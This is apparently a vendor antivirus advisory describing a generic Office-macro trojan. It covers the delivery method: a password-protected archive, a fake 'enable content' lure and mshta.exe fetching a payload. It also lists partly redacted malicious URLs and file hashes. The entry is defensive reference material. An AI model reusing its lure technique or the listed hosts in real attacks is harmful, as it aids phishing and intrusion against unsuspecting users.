MSOffice/PasswordProtected.B3CF!tr
Analysis
MSOffice/PasswordProtected.B3CF!tr is a generic detection for a trojan.
Since this is a generic detection, malware that are detected as MSOffice/PasswordProtected.B3CF!tr may have varying behaviour.
Below are some of its observed characteristics/behaviours:
- This malware arrives as a password protected archive containing a MS document. The password to the archive is approximately 3-6 digits in length. Upon opening the document, there will be an image in the file declaring the document as protected and asking the user to enable editing/content to allow macros. If an unsuspecting user clicks "Enable Content" it risks executing further the malware and will automatically utilize mshta.exe to try to connect to a malicious domain, potentially downloading further components/payload of the attack.
- Below are images of the malicious document:
- Figure 1: Before enabling editing/content.
- Figure 2: After enabling editing/content.
- Figure 3: Utilizing mshta.exe.
- Below are some of the sites associated with the trojan:
- http://91.2[removed]as/se.html
- http://91.2[removed]nn/se.html
- http://91.2[removed]aa/se.html
- Following are some of the exact IOCs/file hash associated with this detection:
- Md5: 24b8882db00b8d6ea8c3329f61daf0eb
Sha256: 5da7512c9c02a5b925a6a0361ad916e64f17a0552db9db6daaf67411648806c6 - Md5: b578993556e27105217ccf8ff80f5743
Sha256: d5fcc40fd1a826e3c2ab64a095ab8af23bf271bc43e27b4e1d0513f1e4dbb4b1 - Md5: ed6c70dc6d0ea14cb10594deeaa7637c
Sha256: 3125aad3f74065c8dcdc25ab27824af7fb93f7c71786684c199b1e1a46162ad4 - Md5: feef1789c4d1f22a7f5c846a6d62d22f
Sha256: d61257109f48fc61a9ce683320b4e3e84eb5698e729c5658596af238111473ac - Md5: 2639abb3c078e563b7123f395522c68b
Sha256: 5689384baac7a92c1c8a45ec1e3864c57b1616c3c93f735fb5aa1d9f8b1880e4 - Md5: 4ff31812b3b44885b15941a23be9e47a
Sha256: c3ce3a92b6f7ba8998cde3d35455a8bd610b8f70b4527a06268755ec7783098c
- Md5: 24b8882db00b8d6ea8c3329f61daf0eb
Recommended Action
- Make sure that your FortiGate/FortiClient system is using the latest AV database.
- Quarantine/delete files that are detected and replace infected files with clean backup copies.
Telemetry
Detection Availability
FortiGate | |
---|---|
FortiClient | |
FortiAPS | |
FortiAPU | |
FortiMail | |
FortiSandbox | |
FortiWeb | |
Web Application Firewall | |
FortiIsolator | |
FortiDeceptor | |
FortiEDR |